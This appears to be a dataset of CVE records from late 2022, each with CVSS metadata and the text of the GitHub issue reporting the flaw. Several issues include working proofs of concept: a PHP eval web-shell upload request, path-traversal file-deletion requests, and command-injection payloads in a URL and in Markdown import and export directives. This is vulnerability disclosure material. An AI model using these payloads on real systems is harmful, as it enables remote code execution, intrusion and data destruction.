Build environment: Apache 2.4.39; MySQL5.7.26; PHP7.3.4 1. Tenst-register.php has a file upload vulnerability ```php+HTML <form method="POST" action="tenant-engine.php" enctype="multipart/form-data"> ``` tenant-register. PHP, the ninth line of code. The information filled in by the front end includes the uploaded file, which is transferred to the back end through POST requests. No filtering is performed in this process tenant-engine.php, In tenant engineering Php, the 40th line of code - the 51st line of code. The uploaded file is stored in the tenant photo directory, and the successful file upload returns the file name information, ```php function tenant_register(){ if(isset($_FILES['id_photo'])) { $id_photo='tenant-photo/'.$_FILES['id_photo']['name']; // echo $_FILES['image']['name'].'<br>'; if(!empty($_FILES['id_photo'])){ $path = "tenant-photo/"; $path=$path. basename($_FILES['id_photo']['name']); if(move_uploaded_file($_FILES['id_photo']['tmp_name'], $path)) { echo"The file ". basename($_FILES['id_photo']['name']). " has been uploaded"; } else{ echo "There was an error uploading the file, please try again!"; } } ``` POC: ```html POST /tenant-engine.php HTTP/1.1 Host: vulhrs.test Content-Length: 942 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://vulhrs.test Content-Type: multipart/form-data; boundary=----WebKitFormBoundary20U7c62S7R9CYJAb User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://vulhrs.test/tenant-register.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2c9e17rrnh26evjlb19dj3uavk Connection: close ------WebKitFormBoundary20U7c62S7R9CYJAb Content-Disposition: form-data; name="full_name" vul ------WebKitFormBoundary20U7c62S7R9CYJAb Content-Disposition: form-data; name="email" ace@ace.com ------WebKitFormBoundary20U7c62S7R9CYJAb Content-Disposition: form-data; name="password" 666666 ------WebKitFormBoundary20U7c62S7R9CYJAb Content-Disposition: form-data; name="phone_no" 123456123 ------WebKitFormBoundary20U7c62S7R9CYJAb Content-Disposition: form-data; name="address" aceace ------WebKitFormBoundary20U7c62S7R9CYJAb Content-Disposition: form-data; name="id_type" Citizenship ------WebKitFormBoundary20U7c62S7R9CYJAb Content-Disposition: form-data; name="id_photo"; filename="POC.php" Content-Type: application/octet-stream <?php @eval($_GET['ace']);?> ------WebKitFormBoundary20U7c62S7R9CYJAb Content-Disposition: form-data; name="tenant_register" ------WebKitFormBoundary20U7c62S7R9CYJAb-- ``` ![](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/uppoc.png) Execute phpinfo: http://vulhrs.test/tenant-photo/POC.php?ace=phpinfo(); ![](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/1202phpinfo.png)
Tenst-register.php has a file upload vulnerability
https://api.github.com/repos/nikeshtiwari1/House-Rental-System/issues/8/comments
0
2022-12-02T01:46:42Z
2022-12-17T07:11:39Z
https://github.com/nikeshtiwari1/House-Rental-System/issues/8
1,472,191,544
8
4,477
CVE-2022-41642
2022-12-05T04:15:09.857
OS command injection vulnerability in Nadesiko3 (PC Version) v3.3.61 and earlier allows a remote attacker to execute an arbitrary OS command when processing compression and decompression on the product.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "vultures@jpcert.or.jp", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kujirahand/nadesiko3/issues/1325" }, { "source": "vultures@jpcert.or.jp", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kujirahand/nadesiko3/issues/1347" }, { "source": "vultures@jpcert.or.jp", "tags": [ "Third Party Advisory" ], "url": "https://jvn.jp/en/jp/JVN56968681/index.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kujirahand/nadesiko3/issues/1325" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kujirahand/nadesiko3/issues/1347" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://jvn.jp/en/jp/JVN56968681/index.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kujirahand:nadesiko3:*:*:*:*:*:*:*:*", "matchCriteriaId": "C5A044E7-2248-4B46-9E15-F65F69F61CB6", "versionEndExcluding": null, "versionEndIncluding": "3.3.68", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/kujirahand/nadesiko3/issues/1325
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "kujirahand", "nadesiko3" ]
なでしこ3のPC版(Node.js版)において「圧縮」「解凍」について、コマンドインジェクションの問題がありました。 以下のコミットで修正済みです。 - 56ccfb2f9cceaec83e6a9d3024c3ba8c54ebe1a4 - 61a70792752a75b7f71df214e98a236721ea3fa6 - 124871c064cfc65cdcd83205637e84fc246c76df このバグに気付いてもらえただけでも、セキュリティネクストキャンプで講師やって良かったです!! @satoki 報告、ありがとうございました!
cnako3の圧縮解凍の問題
https://api.github.com/repos/kujirahand/nadesiko3/issues/1325/comments
1
2022-08-24T04:27:39Z
2022-10-07T05:19:34Z
https://github.com/kujirahand/nadesiko3/issues/1325
1,348,845,959
1,325
4,478
CVE-2022-41642
2022-12-05T04:15:09.857
OS command injection vulnerability in Nadesiko3 (PC Version) v3.3.61 and earlier allows a remote attacker to execute an arbitrary OS command when processing compression and decompression on the product.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "vultures@jpcert.or.jp", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kujirahand/nadesiko3/issues/1325" }, { "source": "vultures@jpcert.or.jp", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kujirahand/nadesiko3/issues/1347" }, { "source": "vultures@jpcert.or.jp", "tags": [ "Third Party Advisory" ], "url": "https://jvn.jp/en/jp/JVN56968681/index.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kujirahand/nadesiko3/issues/1325" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kujirahand/nadesiko3/issues/1347" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://jvn.jp/en/jp/JVN56968681/index.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kujirahand:nadesiko3:*:*:*:*:*:*:*:*", "matchCriteriaId": "C5A044E7-2248-4B46-9E15-F65F69F61CB6", "versionEndExcluding": null, "versionEndIncluding": "3.3.68", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/kujirahand/nadesiko3/issues/1347
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "kujirahand", "nadesiko3" ]
- appkeyが短かったため総当たりでキーが取得される可能性があった - appkeyが取得された場合、nako3editにおいてファイル名経由で任意のコマンドを実行される問題があった。 - (例) http://localhost:8888/html/edit.html?file=`xeyes`.nako&appkey=K8078c3 - 以下コード中のdecodeURIComponentに不正な値が渡ることでサーバ機能が強制終了する問題があった - (例) http://localhost:8888/html/edit.html?file=%
nako3editのファイルの扱いの問題
https://api.github.com/repos/kujirahand/nadesiko3/issues/1347/comments
1
2022-10-07T04:00:42Z
2022-10-07T05:42:16Z
https://github.com/kujirahand/nadesiko3/issues/1347
1,400,586,471
1,347
4,479
CVE-2022-45283
2022-12-06T00:15:10.257
GPAC MP4box v2.0.0 was discovered to contain a stack overflow in the smil_parse_time_list parameter at /scenegraph/svg_attributes.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2295" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2295" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D7AEE044-50E9-4230-B492-A5FF18653115", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/2295
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [X] I looked for a similar issue and couldn't find any. - [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ # Description A fixed length buffer value_string is allocated in smil_parse_time_list, while in the later memcpy, it doesn't check the length and simply copy content to this buffer, causing overflow. ```c static void smil_parse_time_list(GF_Node *e, GF_List *values, char *begin_or_end_list) { SMIL_Time *value; char value_string[500]; char *str = begin_or_end_list, *tmp; u32 len; /* get rid of leading spaces */ while (*str == ' ') str++; while (1) { tmp = strchr(str, ';'); if (tmp) len = (u32) (tmp-str); else len = (u32) strlen(str); memcpy(value_string, str, len); while ((len > 0) && (value_string[len - 1] == ' ')) ``` # Impact Since the content is absolutely controllable by users, an unlimited length will cause stack overflow, corrupting canary, causing DoS or even Remote Code Execution. # Mitigation We can just set a length limit to it, making it less than 500 byte. # Reproduce On Ubuntu 22.04 lts, make with this. ``` ./configure --static-bin make ``` Run the following command with POC.svg. ``` MP4Box -mp4 -sync 0x1000 ./POC.svg ``` You may get a buffer overflow detected error. ``` [Parser] SVG Scene Parsing: ../encode_2-gpac-2.0.0/out/default/crashes/0.svg *** buffer overflow detected ***: terminated | (00/100) Aborted ``` GDB info before crash ``` ─────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]────────────────────────────────────────────────────── RAX 0x6804 RBX 0x0 RCX 0x1f4 RDX 0x6804 *RDI 0x7fffffff6640 ◂— 0x0 RSI 0xda20cc ◂— 0xff22802d68353548 R8 0x0 R9 0xda08b0 ◂— 0x0 R10 0xda2050 ◂— 0x1790 R11 0xd80c00 (main_arena+96) —▸ 0xdabcf0 ◂— 0x0 R12 0xda08b0 ◂— 0x0 R13 0x7fffffff6640 ◂— 0x0 R14 0xda20cc ◂— 0xff22802d68353548 R15 0xb650c3 ◂— 'wallclock(' RBP 0x6804 RSP 0x7fffffff6600 ◂— 0x0 *RIP 0x4c756b (smil_parse_time_list+123) ◂— call 0xadfe30 ──────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]─────────────────────────────────────────────────────────────── 0x4c77e2 <smil_parse_time_list+754> jmp smil_parse_time_list+110 <smil_parse_time_list+110> ↓ 0x4c755e <smil_parse_time_list+110> mov edx, ebp 0x4c7560 <smil_parse_time_list+112> mov ecx, 0x1f4 0x4c7565 <smil_parse_time_list+117> mov rsi, r14 0x4c7568 <smil_parse_time_list+120> mov rdi, r13 ► 0x4c756b <smil_parse_time_list+123> call __memcpy_chk <__memcpy_chk> dstpp: 0x7fffffff6640 ◂— 0x0 srcpp: 0xda20cc ◂— 0xff22802d68353548 len: 0x6804 dstlen: 0x1f4 ``` Backtrace ``` pwndbg> bt #0 0x0000000000a84c3c in pthread_kill () #1 0x0000000000a640d6 in raise () #2 0x0000000000402136 in abort () #3 0x0000000000a7b476 in __libc_message () #4 0x0000000000adfe2a in __fortify_fail () #5 0x0000000000adfc46 in __chk_fail () #6 0x00000000004c7570 in smil_parse_time_list () #7 0x00000000004c965b in gf_svg_parse_attribute () #8 0x000000000063d178 in svg_node_start () #9 0x0000000000463486 in xml_sax_node_start () #10 0x0000000000464629 in xml_sax_parse () #11 0x0000000000464e63 in xml_sax_read_file.part () #12 0x000000000046515e in gf_xml_sax_parse_file () #13 0x000000000063b80a in load_svg_run () #14 0x000000000042a5e8 in EncodeFile () #15 0x000000000041252c in mp4boxMain () #16 0x0000000000a598fa in __libc_start_call_main () #17 0x0000000000a5b157 in __libc_start_main_impl () #18 0x0000000000402b95 in _start () ``` # Credit xdchase # POC [POC-bof.zip](https://github.com/gpac/gpac/files/9894378/POC-bof.zip)
GPAC-2.0.0 MP4Box: stack overflow with unlimited length and controllable content in smil_parse_time_list
https://api.github.com/repos/gpac/gpac/issues/2295/comments
0
2022-10-29T18:52:22Z
2022-11-04T08:28:14Z
https://github.com/gpac/gpac/issues/2295
1,428,405,742
2,295
4,480
CVE-2022-44289
2022-12-06T16:15:11.337
Thinkphp 5.1.41 and 5.0.24 has a code logic error which causes file upload getshell.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/top-think/framework/issues/2772" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/top-think/framework/issues/2772" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thinkphp:thinkphp:5.0.24:*:*:*:*:*:*:*", "matchCriteriaId": "A396FB8E-3328-435E-998E-70426F1F5FFA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:thinkphp:thinkphp:5.1.41:*:*:*:*:*:*:*", "matchCriteriaId": "4DA2B1F4-3E30-4F7B-8EEC-C29B1E6449DE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/top-think/framework/issues/2772
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "top-think", "framework" ]
**Code logic error causes file upload getshell** Verify version:Thinkphp5.1.41/Thinkphp5.0.24 Install:composer create-project topthink/think tp 5.xxx test version:Thinkphp5.1.41 If the user directly uses the move method of thinkphp like this:Add an upload controller like the official documentation:[https://www.kancloud.cn/manual/thinkphp5_1/354121](url) ```php <?php namespace app\index\controller; class Upload { public function index(){ // 获取表单上传文件 例如上传了001.jpg $file = request()->file('image'); // 移动到框架网站目录/uploads/ 目录下 $info = $file->move( './uploads'); if($info){ // 成功上传后 获取上传信息 // 输出 jpg echo $info->getExtension(); // 输出 20160820/42a79759f284b767dfcb2a0197904287.jpg echo $info->getSaveName(); // 输出 42a79759f284b767dfcb2a0197904287.jpg echo $info->getFilename(); }else{ // 上传失败获取错误信息 echo $file->getError(); } } } ``` Will cause the file with the suffix php to be uploaded directly Because in `thinkphp\library\think\File.php` line 272 it is allowed ```php public function checkImg() { $extension = strtolower(pathinfo($this->getInfo('name'), PATHINFO_EXTENSION)); /* 对图像文件进行严格检测 */ if (in_array($extension, ['gif', 'jpg', 'jpeg', 'bmp', 'png', 'swf']) && !in_array($this->getImageType($this->filename), [1, 2, 3, 4, 6, 13])) { $this->error = 'illegal image files'; return false; } return true; } ``` ![11231231](https://user-images.githubusercontent.com/103976565/197378023-9aee1850-e07c-4ba8-ab99-dd201ab7b4d3.png) ![20221023143515](https://user-images.githubusercontent.com/103976565/197377811-ddf041a6-b9d9-41f8-b314-b66a5c50e953.jpg) I think the problem is that true and false are written in reverse. And !in_array getImageType The logic should be? ```php public function checkImg() { $extension = strtolower(pathinfo($this->getInfo('name'), PATHINFO_EXTENSION)); /* 对图像文件进行严格检测 */ if (in_array($extension, ['gif', 'jpg', 'jpeg', 'bmp', 'png', 'swf']) && in_array($this->getImageType($this->filename), [1, 2, 3, 4, 6, 13])) { return true; } return false; } ```
Code logic error causes file upload getshell
https://api.github.com/repos/top-think/framework/issues/2772/comments
5
2022-10-23T06:53:23Z
2024-10-08T01:50:16Z
https://github.com/top-think/framework/issues/2772
1,419,671,628
2,772
4,481
CVE-2022-44942
2022-12-07T02:15:09.497
Casdoor before v1.126.1 was discovered to contain an arbitrary file deletion vulnerability via the uploadFile function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/casdoor/casdoor/issues/1171" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/casdoor/casdoor/issues/1171" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:*", "matchCriteriaId": "61CC9797-6380-4BAC-B4CD-18F04197D310", "versionEndExcluding": "1.126.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/casdoor/casdoor/issues/1171
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "casdoor", "casdoor" ]
Hi, I was looking at the fix to https://github.com/casdoor/casdoor/issues/1035: ![image](https://user-images.githubusercontent.com/26839305/193245742-4033c5e3-85ee-43fe-b18f-81179e0a9a55.png) And I noticed it only fixes the path traversal in file upload, while file deletion is still vulnerable. Thus, it's possible to delete any file outside application's webroot: ![poc](https://user-images.githubusercontent.com/26839305/193246634-1a896ca5-6250-4b79-9ba1-40bad660c6c3.gif) POC request: ``` POST /api/delete-resource?provider= HTTP/1.1 Host: localhost:8008 Content-Length: 363 sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 sec-ch-ua-platform: "Windows" Content-Type: text/plain;charset=UTF-8 Accept: */* Origin: http://localhost:8008 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost:8008/resources Accept-Encoding: gzip, deflate Accept-Language: en,pl-PL;q=0.9,pl;q=0.8,en-US;q=0.7 Cookie: casdoor_session_id=93862e25f31761d7cde831cdf4b93f14; Hm_lvt_5998fcd123c220efc0936edf4f250504=1664531159; Hm_lpvt_5998fcd123c220efc0936edf4f250504=1664531383 Connection: close {"owner":"built-in","name":"/avatar/../../tmp/test.txt","createdTime":"2022-09-30T09:49:17Z","user":"admin","provider":"app-built-in","application":"app-built-in","tag":"avatar","parent":"CropperDiv","fileName":"admin.jpeg","fileType":"image","fileFormat":".jpeg","fileSize":159547,"url":"/files/avatar/built-in/admin.jpeg?t=1664531357206668083","description":""} ```
Arbitrary file delete vulnerability
https://api.github.com/repos/casdoor/casdoor/issues/1171/comments
2
2022-09-30T10:05:05Z
2022-09-30T16:39:26Z
https://github.com/casdoor/casdoor/issues/1171
1,392,193,950
1,171
4,482
CVE-2022-45025
2022-12-07T02:15:10.223
Markdown Preview Enhanced v0.6.5 and v0.19.6 for VSCode and Atom was discovered to contain a command injection vulnerability via the PDF file import function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/shd101wyy/vscode-markdown-preview-enhanced/issues/639" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/shd101wyy/vscode-markdown-preview-enhanced/issues/639" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:markdown_preview_enhanced_project:markdown_preview_enhanced:0.6.5:*:*:*:*:atom:*:*", "matchCriteriaId": "267A6438-0CAF-4A16-8FB9-9A734FD0E7F7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:markdown_preview_enhanced_project:markdown_preview_enhanced:0.6.5:*:*:*:*:vscode:*:*", "matchCriteriaId": "8149490B-0782-4810-8CFE-122F5EB82A86", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:markdown_preview_enhanced_project:markdown_preview_enhanced:0.19.6:*:*:*:*:atom:*:*", "matchCriteriaId": "554CF389-BADD-4605-A6A4-2832C4E1AAD3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:markdown_preview_enhanced_project:markdown_preview_enhanced:0.19.6:*:*:*:*:vscode:*:*", "matchCriteriaId": "A5C493A7-BB06-4DEF-89C2-D9197A560788", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/shd101wyy/vscode-markdown-preview-enhanced/issues/639
[ "Exploit", "Third Party Advisory" ]
github.com
[ "shd101wyy", "vscode-markdown-preview-enhanced" ]
Video PoC for VSCode on [YouTube](https://www.youtube.com/watch?v=bnK5DPdb5JU): [![PoC](https://img.youtube.com/vi/bnK5DPdb5JU/0.jpg)](https://www.youtube.com/watch?v=bnK5DPdb5JU) Original issue: [shd101wyy/mume, OS command injection in PDF import functionality](https://github.com/shd101wyy/mume/issues/273) STR (please, note that the following PoC works for OS X it might be different for Linux or Windows): 1. Create a document with a following content @import "$(open -a Calculator > /dev/null | exit 0)hello.pdf 2. In VSCode/Atom open document preview using the plugin. 3. Calculator program should appear on the screen.
[Vulnerability] Code exection via markdown preview
https://api.github.com/repos/shd101wyy/vscode-markdown-preview-enhanced/issues/639/comments
1
2022-11-22T20:44:14Z
2022-12-07T20:22:03Z
https://github.com/shd101wyy/vscode-markdown-preview-enhanced/issues/639
1,460,527,375
639
4,483
CVE-2022-45026
2022-12-07T02:15:10.410
An issue in Markdown Preview Enhanced v0.6.5 and v0.19.6 for VSCode and Atom allows attackers to execute arbitrary commands during the GFM export process.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/shd101wyy/vscode-markdown-preview-enhanced/issues/640" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/shd101wyy/vscode-markdown-preview-enhanced/issues/640" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:markdown_preview_enhanced_project:markdown_preview_enhanced:0.6.5:*:*:*:*:atom:*:*", "matchCriteriaId": "267A6438-0CAF-4A16-8FB9-9A734FD0E7F7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:markdown_preview_enhanced_project:markdown_preview_enhanced:0.6.5:*:*:*:*:vscode:*:*", "matchCriteriaId": "8149490B-0782-4810-8CFE-122F5EB82A86", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:markdown_preview_enhanced_project:markdown_preview_enhanced:0.19.6:*:*:*:*:atom:*:*", "matchCriteriaId": "554CF389-BADD-4605-A6A4-2832C4E1AAD3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:markdown_preview_enhanced_project:markdown_preview_enhanced:0.19.6:*:*:*:*:vscode:*:*", "matchCriteriaId": "A5C493A7-BB06-4DEF-89C2-D9197A560788", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/shd101wyy/vscode-markdown-preview-enhanced/issues/640
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "shd101wyy", "vscode-markdown-preview-enhanced" ]
Video PoC for VSCode on [YouTube](https://www.youtube.com/watch?v=D0HdwtDoFXs): [![PoC](https://img.youtube.com/vi/D0HdwtDoFXs/0.jpg)](https://www.youtube.com/watch?v=D0HdwtDoFXs) Original issue: [shd101wyy/mume, OS command injection via Memraid PNG export](https://github.com/shd101wyy/mume/issues/274) STR (please, note that the following PoC works for OS X it might be different for Linux or Windows): 1. Create document with the following code inside. ``` mermaid {filename="$(open -a Calculator)hello.pdf"} gitGraph commit id: "Normal" commit commit id: "Reverse" type: REVERSE commit commit id: "Highlight" type: HIGHLIGHT commit ``` 2. Open preview 3. Use "Save as Markdown" button in the preview window 4. Calculator program should appear on the screen.
[Vulnerability] Code execution via GitHub Flavored Markdown export
https://api.github.com/repos/shd101wyy/vscode-markdown-preview-enhanced/issues/640/comments
1
2022-11-22T20:44:39Z
2022-12-07T20:23:41Z
